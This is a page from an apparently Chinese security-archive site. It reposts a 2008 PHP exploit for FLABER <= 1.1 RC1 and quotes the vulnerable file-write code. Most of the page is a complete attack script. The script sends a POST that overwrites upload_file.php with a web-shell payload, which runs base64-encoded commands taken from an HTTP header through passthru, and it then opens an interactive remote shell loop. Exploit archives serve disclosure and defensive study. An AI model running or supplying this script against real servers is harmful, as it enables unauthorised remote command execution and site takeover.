首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 FLABER <= 1.1 RC1 Remote Command Execution Exploit 来源：n0b0d13s[at]gmail[dot]com 作者：EgiX 发布时间：2008-04-09   <?php /* -------------------------------------------------- FLABER <= 1.1 RC1 Remote Command Execution Exploit -------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://sourceforge.net/projects/flaber [-] vulnerable code in /function/update_xml.php 12. $target_file = $_GET ["target_file"]; 13. 14. // if the target is well defined, update now... 15. if ($target_file == "") 16. { 17. echo ("<critical>" . $FILE_NAME . " Incorrect parameter target_file.</critical>"); 18. exit; 19. } 20. 21. 22. $target_file = "../" . $target_file; 23. 24. // if it is a file 25. if (is_file ($target_file)) 26. { 27. if (!is_writable ($target_file)) 28. { 29. echo ("<critical>" . $FILE_NAME . " " . $target_file . " is not writable.</critical>"); 30. exit; 31. } 32. 33. $fp = fopen($target_file, "w"); 34. 35. $raw_xml = file_get_contents("php://input"); 36. fwrite($fp, $raw_xml); 37. 38. fclose ($fp); 39. echo ("<normal>" . $FILE_NAME . " " . $target_file . " updated successfully.</normal>"); 40. exit; 41. } an attacker could be overwrite an existing file with arbitrary data by $_POST array (lines 33-36) */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from ".$host.":80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print "\n+------------------------------------------------------------+"; print "\n| FLABER <= 1.1 RC1 Remote Command Execution Exploit by EgiX |"; print "\n+------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage: php $argv[0] host path\n"; print "\nhost: target server (ip/hostname)"; print "\npath: path to FLABER directory (example: / or /flaber/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>"; $packet  = "POST {$path}function/update_xml.php?target_file=function/upload_file.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; if (!preg_match("/updated successfully/", http_send($host, $packet))) die("\n\n[-] Exploit failed...\n"); define(STDIN, fopen("php://stdin", "r")); while(1) { print "\nxpl0it-sh3ll > "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet  = "GET {$path}function/upload_file.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: ".base64_encode($cmd)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!ereg("_code_", $html)) die("\n[-] Exploit failed...\n"); $shell = explode("_code_", $html); print "\n".$shell[1]; } else break; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·phpTournois <= G4 Remote File ·LokiCMS <= 0.3.3 Remote Comman ·Tumbleweed SecureTransport Fil ·Biz E-Banking Integrator V2 Ac ·Data Dynamics ActiveBar (Actba ·phpBB Add-on Fishing Cat Porta ·LinPHA <= 1.3.2 (maps plugin) ·KnowledgeQuest 2.5 Arbitrary A ·Drake CMS <= 0.4.11 Remote Bli ·LiveCart <= 1.1.1 (category id ·LightNEasy 1.2 (no database) R ·Apache Tomcat Connector jk2-2.   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved